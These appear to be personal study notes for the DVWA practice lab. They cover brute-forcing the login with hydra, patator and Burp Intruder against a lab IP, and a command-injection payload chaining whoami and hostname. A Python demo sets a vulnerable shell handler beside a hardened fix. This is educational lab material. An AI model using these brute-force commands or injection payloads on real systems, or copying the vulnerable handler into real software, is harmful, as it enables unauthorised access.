Install

digininja/DVWA

https://www.youtube.com/watch?v=6EbdPO3nPmo

Brute Force

Low

Hydra (failed)

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-get-form://10.1.1.92/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=4h0uedpbegdva5blbjtm85o5iq; security=low" -V -t 4

Likely reason the original attempt failed: the path was written as /vulnerabilities/brute/? and hydra inserts the ? itself when it joins the path and the form fields for http-get-form, so every request went to /brute/??username=... and DVWA never saw a username parameter, rejecting all candidates. The command above drops the stray ?, marks the failure string explicitly with F= and writes the cookie header in hydra's documented H=Cookie: form. The PHPSESSID must come from a browser session that is currently logged in to DVWA.

Patator

$ patator http_fuzz url="http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
19:23:33 patator    INFO - Starting Patator 0.9 (<https://github.com/lanjelot/patator>) with python-3.8.6 at 2020-11-23 19:23 AEST
19:23:34 patator    INFO -                                                                              
19:23:34 patator    INFO - code size:clen       time | candidate                          |   num | mesg
19:23:34 patator    INFO - -----------------------------------------------------------------------------
19:23:34 patator    INFO - 200  4547:4275      0.004 | password                           |     4 | HTTP/1.1 200 OK

Burp Suite

  1. Proxy > Intercept tab

    1. Turn intercept off
    2. Open browser

    https://s3-us-west-2.amazonaws.com/secure.notion-static.com/cde40ae7-155a-4499-8c4c-cd51ee679870/Untitled.png

  2. Attempt login with user:password

  3. Proxy > HTTP history tab

    1. Find the GET request for the login attempt

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a28abd60-140c-43da-b442-5dd91e8546db/Untitled.png

    2. Check the details:

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/04abee9d-28b5-4074-83b6-bcc6bb050f42/Untitled.png

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a61b3e79-2bf4-4992-aa21-409efa5c867c/Untitled.png

    3. Right click the line, or click Actions, then Send to Intruder

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4d574299-cfd0-44a8-8b14-f41c8b502929/Untitled.png

    4. Intruder > Positions tab. Clear the auto-selected positions and mark only the password value as a payload position, keeping username fixed at admin.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/684d5c02-8537-4a95-8233-388e6d7b3fe0/Untitled.png

    5. Intruder > Payloads tab. Load rockyou.txt.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/35346041-6b6c-46b8-a9c1-fbf62cbff007/Untitled.png

    6. Start attack!

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ef2a5837-a91a-4df6-865e-b93fa413cae9/Untitled.png

    7. Review the results. Sort by status code or response length; the rejected attempts all return the same length, so the one that differs is the hit.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/25c92d0b-152c-4259-9384-6242d7e05fbf/Untitled.png

    8. Payload "password" returns a response of length 4566, different from every other candidate.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/50fd7ce2-f2ae-48e9-817a-a83be6a8b411/Untitled.png

    9. Check in the browser.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8af47685-651b-4c37-b823-101661239525/Untitled.png

Command Injection

Using the RCE, find out remotely which OS user the web service runs as and the machine's hostname.

Low

The IP field is concatenated straight into the ping command, so a semicolon ends the ping and chains further commands after it, e.g. 127.0.0.1; whoami; hostname.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e08bcdf5-ec6b-4dc4-b2fa-fd85cda472e4/Untitled.png
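To see why the semicolon works and what closes the hole, here is a Python model of the low-level handler beside a hardened version, added here as an example and not DVWA's own PHP. The real page runs shell_exec('ping -c 4 ' . $target); in this demo 'echo PING' stands in for ping so it runs offline, and id / uname -n stand in for the whoami / hostname you would type into the form. Those substitutions and the payload string are assumptions for the example.

```python
"""DVWA 'Command Injection' (low): the IP field is concatenated into a shell command, so
a ';' ends the ping and whatever follows runs as the web server's OS user.
Added example; the handler below is a Python model of the PHP page, not DVWA's code."""
import ipaddress
import subprocess
from typing import List

# The real page runs shell_exec('ping -c 4 ' . $target). 'echo PING' stands in for ping so
# the demo runs offline without a ping binary or network (assumption for this example).
PING_CMD = "echo PING"

# Payload for the task above: chain the two questions after the ping. On the DVWA form you
# would type 127.0.0.1; whoami; hostname; 'id' and 'uname -n' answer the same questions and
# exist in both coreutils and busybox (assumption for this example).
PAYLOAD = "127.0.0.1; id; uname -n"


def vulnerable_ping(target: str) -> str:
    """Low level: raw string concatenation handed to /bin/sh, exactly the bug being exploited."""
    cmd = f"{PING_CMD} {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_ping_argv(target: str) -> List[str]:
    """Fix: parse the input as an IP address and pass it as one argv element. No shell is
    involved, so ';', '&&', '|' and backticks are just characters that fail validation."""
    ip = ipaddress.ip_address(target.strip())  # raises ValueError for anything but an IP
    return PING_CMD.split() + [str(ip)]


def hardened_ping(target: str) -> str:
    """Same command built from the validated argv, executed without a shell."""
    return subprocess.run(hardened_ping_argv(target), capture_output=True, text=True).stdout


def is_safe_target(target: str) -> bool:
    """True only when the hardened builder accepts the value."""
    try:
        hardened_ping_argv(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable:\n" + vulnerable_ping(PAYLOAD))  # PING line, then the user, then the host
    print("hardened, valid IP:\n" + hardened_ping("127.0.0.1"))
    print("hardened, payload accepted?", is_safe_target(PAYLOAD))
```

The vulnerable path prints three lines for the payload: the fake ping output followed by the output of id and uname -n, i.e. the two answers the task asks for. The hardened path rejects the same string before any process is started; the fix is the combination of validating the value as an IP address and passing it as an argv element rather than through a shell, since either half alone still leaves a parser in the way.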

Medium